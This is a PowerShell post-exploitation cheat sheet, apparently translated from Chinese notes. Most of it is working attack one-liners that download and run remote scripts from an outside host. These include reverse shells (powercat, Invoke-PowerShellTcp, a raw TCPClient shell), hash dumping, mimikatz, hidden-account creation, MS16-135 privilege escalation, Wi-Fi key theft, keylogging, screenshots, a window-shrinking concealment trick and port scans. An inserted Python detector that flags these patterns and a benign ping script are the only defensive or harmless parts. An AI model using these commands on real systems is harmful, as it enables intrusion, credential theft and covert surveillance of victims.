Preface
After going through a lot of PowerShell material I summarised a few fairly practical commands as notes. Unless stated otherwise, the commands below can be run from cmd without any interaction.
Check whether PowerShell is available
if defined PSModulePath (echo 支持powershell) else (echo 不支持powershell)
Download a file
PowerShell 2.0 (Windows 7)
powershell (New-Object Net.WebClient).DownloadFile('http://47.94.80.xxx/ps/a.ps1','E:\phpstudy_pro\WWW\a.ps1')
PowerShell 3.0 and later (Windows 8 and later)
Built-in Invoke-WebRequest (wget is an alias for it)
wget "http://10.0.0.10/nc.exe" -outfile "nc.exe"
Base64-encode a command (UTF-16LE, the form -EncodedCommand expects)
$fileContent = "IEX(new-object System.Net.WebClient).DownloadString('http://47.94.80.xxx/ps/a.ps1')"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($fileContent);
$encoded = [System.Convert]::ToBase64String($bytes);
$encoded
Base64 encode/decode a file
Encode
$PEBytes = [System.IO.File]::ReadAllBytes("scan.exe")
$Base64Payload = [System.Convert]::ToBase64String($PEBytes)
Set-Content base64.txt -Value $Base64Payload
Decode
$Base64Bytes = Get-Content ("base64.txt")
$PEBytes= [System.Convert]::FromBase64String($Base64Bytes)
[System.IO.File]::WriteAllBytes("scan.exe",$PEBytes)
Reverse shell
Probe which outbound ports are allowed (tnc is the Test-NetConnection alias)
powershell.exe -c "1..100 | % { tnc -informationlevel quiet baidu.com -port $_} "
Shrink the window to 1x1 instead of hiding it
powershell.exe -nop -c "$w=$Host.UI.RawUI.WindowSize;$w.Width=1;$w.Height=1;$Host.UI.RawUI.Set_windowsize($w);IEX ((new-object net.webclient).downloadstring('http://xxx.xxx.xxx/a'))"
Reverse cmd shell
powershell IEX (New-Object Net.Webclient).DownloadString('http://47.94.9.xx/ps/powercat.ps1'); powercat -c 192.168.203.140 -p 9999 -e cmd
Reverse PowerShell shell
powershell IEX (New-Object Net.WebClient).DownloadString('http://47.94.80.xxx/nishang/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.203.140 -port 6666
Raw-socket (TCPClient) reverse PowerShell shell
powershell -c "$client = New-Object Net.Sockets.TCPClient('106.xxx.xxx.xxx',9090);$stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback=(iex $data 2>&1 | Out-String );$sendata =$sendback+'PS >';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendata);$leng=$sendbyte.Length;$stream.Write($sendbyte,0,$leng);$stream.Flush()};$client.Close()"
Reverse shell to msf
powershell "IEX(New-Object Net.WebClient).DownloadString('http://47.94.80.xxx/ps/a.ps1')"
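As an added defender-side example (my own code, not part of the original notes), here is a small Python triage routine for process-creation command lines: it reverses the UTF-16LE-then-base64 transform from the Base64 section above and flags the download-cradle, window-shrinking, raw TCPClient and -EncodedCommand patterns that appear in the reverse-shell commands in this section. The sample command lines are constructed, with example.invalid and 203.0.113.5 standing in for the author's redacted hosts.

```python
import base64
import re

# Regexes for the command families in the sections above: the WebClient
# download cradle, IEX of downloaded text, the 1x1 window trick, the raw
# TCPClient reverse shell, and a base64 -EncodedCommand argument.
RULES = {
    "download_cradle": re.compile(r"net\.webclient\)\.download(string|file)\(", re.I),
    "iex_cradle": re.compile(r"\biex\b.*downloadstring", re.I),
    "window_shrink": re.compile(r"rawui\.windowsize|set_windowsize", re.I),
    "tcpclient_shell": re.compile(r"net\.sockets\.tcpclient\(", re.I),
    "encoded_command": re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I),
}

def encode_for_powershell(text):
    """Same transform as the Base64 section above: UTF-16LE bytes, then base64."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")

def decode_encoded_command(blob):
    """Reverse of encode_for_powershell; None if the blob is not a valid payload."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyse_command_line(cmdline):
    """Rule names that fire on one command line; an encoded payload is decoded
    and scanned as well, with its hits prefixed 'encoded:'."""
    hits = {name for name, rx in RULES.items() if rx.search(cmdline)}
    m = RULES["encoded_command"].search(cmdline)
    if m:
        inner = decode_encoded_command(m.group(1))
        if inner is not None:
            hits |= {"encoded:" + h for h in analyse_command_line(inner)}
    return hits

# Constructed sample command lines (not real telemetry); hosts use the
# documentation names example.invalid and 203.0.113.5.
_INNER = "IEX(new-object System.Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
SAMPLE_CMDLINES = [
    "powershell.exe -nop -c \"$w=$Host.UI.RawUI.WindowSize;$w.Width=1;$w.Height=1;"
    "$Host.UI.RawUI.Set_windowsize($w);IEX ((new-object net.webclient).downloadstring('http://example.invalid/a'))\"",
    "powershell.exe -enc " + encode_for_powershell(_INNER),
    "powershell -c \"$client = New-Object Net.Sockets.TCPClient('203.0.113.5',9090);$stream = $client.GetStream()\"",
    "powershell Get-WmiObject -Class Win32_QuickFixEngineering -ComputerName .",
]

def triage(cmdlines=SAMPLE_CMDLINES):
    """Map each command line to its sorted rule hits; an empty list means no hit."""
    return {c: sorted(analyse_command_line(c)) for c in cmdlines}
```

Call triage() on your own list of command lines; the last sample (the hotfix query further down this page) shows that ordinary administrative use of powershell.exe produces no hit.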
List installed hotfixes
powershell Get-WmiObject -Class Win32_QuickFixEngineering -ComputerName .
Privilege escalation and adding an account
Local privilege escalation only
powershell -c "& {Import-Module 'c:\Invoke-MS16-135.ps1';Invoke-MS16-135 -Application cmd.exe -commandline '/c net user test test!@#1234 /add'}"
Dump password hashes in memory (requires administrator privileges)
powershell IEX (New-Object Net.WebClient).DownloadString('http://47.94.80.xxx/ps/Get-PassHashes.ps1');Get-PassHashes
Create a hidden account (requires administrator privileges)
powershell IEX (New-Object Net.WebClient).DownloadString('http://47.94.80.xxx/ps/Create-Clone.ps1'); Create-Clone -u demo$ -p test123 -cu cseroad
Get plaintext credentials with mimikatz (requires administrator privileges)
powershell IEX (New-Object Net.WebClient).DownloadString('http://47.94.80.xxx/ps/Invoke-Mimikatz.ps1'); Invoke-Mimikatz
Information gathering
Local host information gathering
Check whether the host is a virtual machine
powershell IEX (New-Object Net.WebClient).DownloadString('http://47.94.80.xxz/nishang/Gather/Check-VM.ps1');Check-VM
List services
powershell Get-WmiObject Win32_Service
List shares
powershell Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Share
List logged-on users
powershell Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_LoggedOnUser
Check whether an AV product is registered
powershell Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct
Gather miscellaneous host information
powershell IEX (New-Object Net.WebClient).DownloadString('http://47.94.80.xxx/nishang/Gather/Get-Information.ps1');Get-Information
Get saved Wi-Fi keys
powershell IEX (New-Object Net.WebClient).DownloadString('http://47.94.80.xxx/nishang/Gather/Get-WLAN-Keys.ps1');Get-Wlan-Keys
Internal network information gathering
Built-in port scan
powershell -c "1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect(\"10.211.55.10\",$_)) \"Port $_ is open!\"} 2>$null"
Port scan (must be run from a PowerShell session)
IEX (New-Object Net.WebClient).DownloadString('http://47.94.80.xxx/PowerSploit/Recon/Invoke-Portscan.ps1');Invoke-Portscan -Hosts 192.168.167.0/24 -T 4 -Ports "21,22,23,80,1433,1521,3306,3389"
Reverse DNS lookup
powershell IEX (New-Object Net.WebClient).DownloadString('http://47.94.80.xxx/PowerSploit/Recon/Invoke-ReverseDnsLookup.ps1');Invoke-ReverseDnsLookup '192.168.197.220-192.168.197.240'
Post-exploitation
Timed screenshots
powershell IEX (New-Object Net.WebClient).DownloadString('http://47.94.80.xxx/PowerSploit/Exfiltration/Get-TimedScreenshot.ps1');Get-TimedScreenshot -Path E:\ -Interval 5 -EndTime 10:00
Keylogging (must be run from a PowerShell session)
IEX (New-Object Net.WebClient).DownloadString("http://47.94.80.xxx/ps/PowerSploit/Exfiltration/Get-Keystrokes.ps1");Get-Keystrokes -LogPath .\keylog.txt
Local script for batch-pinging a list of domains (prints each name followed by the IPv4 address the ping resolved)
<#Author :PWN.ZHANG@XTPEEPS>CN#>
# Usage: ns_lookup.ps1 <urlfile_path>, one hostname per line in the file
if ($args.Count -gt 0) {
    $File = Get-Content $args[0]
    foreach ($skuLine in $File) {
        Write-Host -NoNewline $skuLine " "
        # Send a single echo request and pull the first IPv4 address out of the ping output
        $m = [regex]::Match(((ping $skuLine -n 1) -join "`n"), "(\d{1,3}\.){3}\d{1,3}")
        if ($m.Success) { $m.Value } else { "unresolved" }
    }
    <#Sleep 100#>
} else {
    "usage: ns_lookup.ps1 <urlfile_path>"
}